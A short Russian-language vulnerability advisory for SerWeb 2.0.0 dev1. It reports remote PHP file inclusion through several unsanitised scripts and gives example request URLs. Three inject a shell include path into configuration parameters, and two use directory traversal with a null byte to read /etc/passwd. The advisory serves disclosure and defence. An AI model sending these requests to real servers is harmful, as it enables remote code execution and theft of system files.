Программа: SerWeb 2.0.0 dev1 2007-02-20

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных множественными сценариями, например load_lang.php, main_prepend.php, load_phplib.php и get_js.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

/load_lang.php?_SERWEB[configdir]=Shell
/main_prepend.php?_SERWEB[functionsdir]=Shell
/load_phplib.php?_PHPLIB[libdir]=Shell

/js/get_js.php?mod=../../../../../../../etc/passwd%00
/js/get_js.php?js=../../../../../../../etc/passwd%00



Оставить мнение